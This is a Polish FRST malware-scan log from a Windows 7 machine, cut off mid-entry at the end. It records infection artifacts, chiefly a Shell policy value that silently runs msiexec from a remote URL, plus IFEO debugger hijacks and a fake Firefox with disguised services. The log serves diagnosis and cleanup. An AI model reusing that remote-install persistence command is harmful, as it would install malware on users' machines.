Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 28-05-2017 Uruchomiony przez MAGDA (administrator) LASTAR-SONY (29-05-2017 11:54:49) Uruchomiony z C:\Users\MAGDA\Downloads Załadowane profile: MAGDA (Dostępne profile: MAGDA & PRACOWNICY & Gość) Platform: Windows 7 Home Premium Service Pack 1 (X64) Język: Polski (Polska) Internet Explorer Wersja 11 (Domyślna przeglądarka: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1") Tryb startu: Normal Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgrsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgcsrva.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe (AMD) C:\Windows\System32\atiesrxx.exe (AMD) C:\Windows\System32\atieclxx.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgfwsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgidsagenta.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgwdsvca.exe (2BrightSparks Pte Ltd) C:\Program Files (x86)\2BrightSparks\SyncBackFree\SyncBackFree.exe (Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe (Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe (Microsoft Corporation) C:\Windows\System32\StikyNot.exe (EnTech Taiwan) C:\Program Files (x86)\Dell\Dell Display Manager\ddm.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgnsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgemca.exe () C:\Program Files (x86)\Comarch\ComarchCryptoProvider\watchdog_service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe (Hewlett-Packard Company) C:\Program Files (x86)\HP\StatusAlerts\bin\HPStatusAlerts.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe () C:\Program Files (x86)\Comarch\ComarchCryptoProvider\watchdog_service.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgui.exe (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe (Hewlett-Packard Company) C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe () C:\Program Files (x86)\Comarch\ComarchCryptoProvider\ComarchCryptoServer.exe (HP) C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe (Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe (Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe (Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe () C:\Program Files (x86)\Comarch\ComarchCryptoProvider\ComarchCryptoServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe (Microsoft Corporation) C:\Windows\System32\msiexec.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe (Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe (Microsoft Corporation) C:\Windows\System32\ie4uinit.exe (Microsoft Corporation) C:\Windows\splwow64.exe ==================== Rejestr (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1156712 2012-04-03] (Realtek Semiconductor) HKLM\...\Run: [BLEServicesCtrl] => C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe [177936 2012-02-17] (Intel Corporation) HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll",TrayApp HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\btvstack.exe [1022592 2012-04-28] (Atheros Communications) HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\athbttray.exe [801920 2012-04-28] (Atheros Commnucations) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1332296 2015-01-30] (Microsoft Corporation) HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-04-09] (Intel Corporation) HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [284440 2011-11-29] (Intel Corporation) HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [343168 2012-02-10] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [Sage Komunikator] => C:\Program Files (x86)\Sage\Komunikator\SageUpdt.exe [246736 2013-01-03] () HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46368 2010-03-09] (Nuance Communications, Inc.) HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [29984 2010-03-09] (Nuance Communications, Inc.) HKLM-x32\...\Run: [PPort12reminder] => "C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe" -r "C:\ProgramData\ScanSoft\PaperPort\12\Config\Ereg\Ereg.ini" HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.) HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.) HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139264 2011-04-20] (Brother Industries, Ltd.) HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [2621440 2010-06-10] (Brother Industries, Ltd.) HKLM-x32\...\Run: [StatusAlerts] => C:\Program Files (x86)\HP\StatusAlerts\bin\HPStatusAlerts.exe [313656 2013-04-18] (Hewlett-Packard Company) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [240400 2016-12-06] (AVG Technologies CZ, s.r.o.) HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [240400 2016-12-06] (AVG Technologies CZ, s.r.o.) HKLM-x32\...\Run: [WatchDogUserAutostart] => C:\Program Files (x86)\Comarch\ComarchCryptoProvider\watchdog_service.exe [529160 2017-03-07] () HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation) HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation) HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-14] (Microsoft Corporation) HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Run: [Infor Organizer] => "C:\Program Files (x86)\Infor PL\Infor Organizer\Infor.Organizer.exe" HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== /q HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\MountPoints2: {8bbffda7-0948-11e7-b10f-08edb9ca09cc} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\MountPoints2: {a096079c-033e-11e4-8a37-08edb9ca09cc} - E:\Startme.exe HKU\S-1-5-21-266744301-1538140241-1666147108-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Corporation) IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dell Display Manager.lnk [2016-09-13] ShortcutTarget: Dell Display Manager.lnk -> C:\Program Files (x86)\Dell\Dell Display Manager\ddm.exe (EnTech Taiwan) GroupPolicy\User: Ograniczenia <======= UWAGA GroupPolicyUsers\S-1-5-21-266744301-1538140241-1666147108-1003\User: Ograniczenia <======= UWAGA ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Hosts: W pliku Hosts jest więcej niż jedno wejście. Sprawdź sekcję Hosts w Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.1.31 Tcpip\..\Interfaces\{034BFF25-A2A0-4B31-91F4-5CF3CB73FC89}: [DhcpNameServer] 85.237.160.6 85.237.160.7 Tcpip\..\Interfaces\{ECFE88A0-C8CB-4FF6-9338-15250A904561}: [DhcpNameServer] 192.168.1.31 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=181&d=20141009 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=181&d=20141009 HKU\S-1-5-21-266744301-1538140241-1666147108-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=181&d=20141009 SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> {E88E0043-C9D4-4e33-8555-FEE4F5B63060} URL = hxxp://go.mail.ru/search?q={searchTerms}&utf8in=1&fr=ietb BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll [2017-05-17] (Oracle Corporation) BHO-x32: Brak nazwy -> {8984B388-A5BB-4DF7-B274-77B879E179DB} -> Brak pliku BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-04-28] (Atheros Commnucations) BHO-x32: Brak nazwy -> {b18906df-1dfa-4d50-8a1f-7d076a8c87b7} -> Brak pliku BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-05-17] (Oracle Corporation) Toolbar: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> Brak nazwy - {09900DE8-1DCA-443F-9243-26FF581438AF} - Brak pliku FireFox: ======== FF DefaultProfile: garrxigo.default-1495690012291 FF DefaultProfile: ddyp7f1d.default FF ProfilePath: C:\Users\MAGDA\AppData\Roaming\Mozilla\Firefox\Profiles\garrxigo.default-1495690012291 [2017-05-29] FF NetworkProxy: Mozilla\Firefox\Profiles\garrxigo.default-1495690012291 -> type", 4 FF ProfilePath: C:\Users\MAGDA\AppData\Roaming\Firefox\Firefox\Profiles\ddyp7f1d.default [2017-05-29] FF Extension: (Polski Language Pack) - C:\Users\MAGDA\AppData\Roaming\Firefox\Firefox\Profiles\ddyp7f1d.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-29] [Brak podpisu cyfrowego] FF SearchPlugin: C:\Users\MAGDA\AppData\Roaming\Firefox\Firefox\Profiles\ddyp7f1d.default\searchplugins\startsearch.xml [2017-05-29] FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-11] () FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-11] () FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-04-03] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-04-03] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-05-17] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-05-17] (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.) Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default [2017-04-26] CHR Extension: (Prezentacje Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-03-31] CHR Extension: (Dokumenty Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-31] CHR Extension: (Dysk Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25] CHR Extension: (YouTube) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25] CHR Extension: (Google Search) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-07] CHR Extension: (Adobe Acrobat) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-01-13] CHR Extension: (Arkusze Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-03-31] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-06-08] CHR Extension: (Gmail) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-31] CHR Profile: C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3 [2016-12-01] CHR Extension: (Prezentacje Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-01] CHR Extension: (Dokumenty Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-01] CHR Extension: (Dysk Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-01] CHR Extension: (YouTube) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-01] CHR Extension: (Szukaj w Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-12-01] CHR Extension: (Arkusze Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-01] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-12-01] CHR Extension: (Gmail) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-01] CHR Profile: C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\System Profile [2016-12-01] CHR Extension: (Dokumenty Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-15] CHR Extension: (Dysk Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-15] CHR Extension: (YouTube) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-15] CHR Extension: (Szukaj w Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-09-15] CHR Extension: (Arkusze Google) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-09-15] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-09-15] CHR Extension: (Gmail) - C:\Users\MAGDA\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-15] CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx StartMenuInternet: Google Chrome.SD7W22FCXCB4UFO4PFEPWQ2J64 - C:\Users\Gość\AppData\Local\Google\Chrome\Application\chrome.exe ==================== Usługi (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [119424 2012-04-28] (Atheros Commnucations) [Brak podpisu cyfrowego] S3 AvgAMPS; C:\Program Files (x86)\AVG\Av\avgamps.exe [1002552 2017-04-11] (AVG Technologies CZ, s.r.o.) R2 avgfws; C:\Program Files (x86)\AVG\Av\avgfwsa.exe [1824184 2017-04-11] (AVG Technologies CZ, s.r.o.) R2 AVGIDSAgent; C:\Program Files (x86)\AVG\Av\avgidsagenta.exe [5334432 2017-04-11] (AVG Technologies CZ, s.r.o.) R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1146128 2016-12-06] (AVG Technologies CZ, s.r.o.) R2 avgwd; C:\Program Files (x86)\AVG\Av\avgwdsvca.exe [729048 2017-04-11] (AVG Technologies CZ, s.r.o.) R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [245760 2010-01-25] (Brother Industries, Ltd.) [Brak podpisu cyfrowego] R2 ComarchCryptoWatchdog; C:\Program Files (x86)\Comarch\ComarchCryptoProvider\watchdog_service.exe [529160 2017-03-07] () R2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp [210946 ] () [Brak podpisu cyfrowego] <==== UWAGA R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [93696 2017-05-26] () [Brak podpisu cyfrowego] <==== UWAGA R2 HP DS Service; C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe [13824 2011-10-17] (Hewlett-Packard Company) [Brak podpisu cyfrowego] R2 HP LaserJet Service; C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe [174592 2012-12-04] (HP) [Brak podpisu cyfrowego] R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-04-03] () R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2012-04-03] (Intel Corporation) R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2015-01-30] (Microsoft Corporation) S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366512 2015-01-30] (Microsoft Corporation) R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [144672 2010-03-09] (Nuance Communications, Inc.) R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [Brak podpisu cyfrowego] <==== UWAGA S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation) R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [163456 2012-04-28] (Atheros) [Brak podpisu cyfrowego] ===================== Sterowniki (filtrowane) ====================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [163072 2016-05-13] (AVG Technologies CZ, s.r.o.) R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [73992 2016-10-23] (AVG Technologies CZ, s.r.o.) R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313088 2017-02-20] (AVG Technologies CZ, s.r.o.) R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [267008 2016-10-05] (AVG Technologies CZ, s.r.o.) R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [298240 2016-11-30] (AVG Technologies CZ, s.r.o.) R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [360736 2016-02-16] (AVG Technologies CZ, s.r.o.) R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [253184 2017-04-11] (AVG Technologies CZ, s.r.o.) R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [52992 2016-06-01] (AVG Technologies CZ, s.r.o.) R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [299264 2016-07-27] (AVG Technologies CZ, s.r.o.) R0 Avguniva; C:\Windows\System32\DRIVERS\avguniva.sys [77056 2016-06-20] (AVG Technologies CZ, s.r.o.) R3 BTATH_VDP; C:\Windows\System32\drivers\btath_vdp.sys [422144 2012-04-28] (Atheros) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [274696 2014-11-15] (Microsoft Corporation) S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124560 2014-11-15] (Microsoft Corporation) S1 MpKsl609328ae; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{15547DD3-66D3-4FC6-A0C8-D0267EAC43CD}\MpKsl609328ae.sys [X] ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc - utworzone pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-05-29 11:54 - 2017-05-29 11:55 - 00025661 _____ C:\Users\MAGDA\Downloads\FRST.txt 2017-05-29 11:47 - 2017-05-29 11:47 - 00001858 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2017-05-29 11:47 - 2017-05-29 11:47 - 00000000 ____D C:\Users\MAGDA\AppData\Roaming\Firefox 2017-05-29 11:47 - 2017-05-29 11:47 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-05-29 11:43 - 2017-05-29 11:43 - 00000000 ___RD C:\Users\MAGDA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices 2017-05-29 11:33 - 2017-05-29 11:33 - 00000911 _____ C:\Users\MAGDA\Desktop\FIXIT.txt 2017-05-29 10:43 - 2017-05-29 10:43 - 01214687 _____ (Higih ) 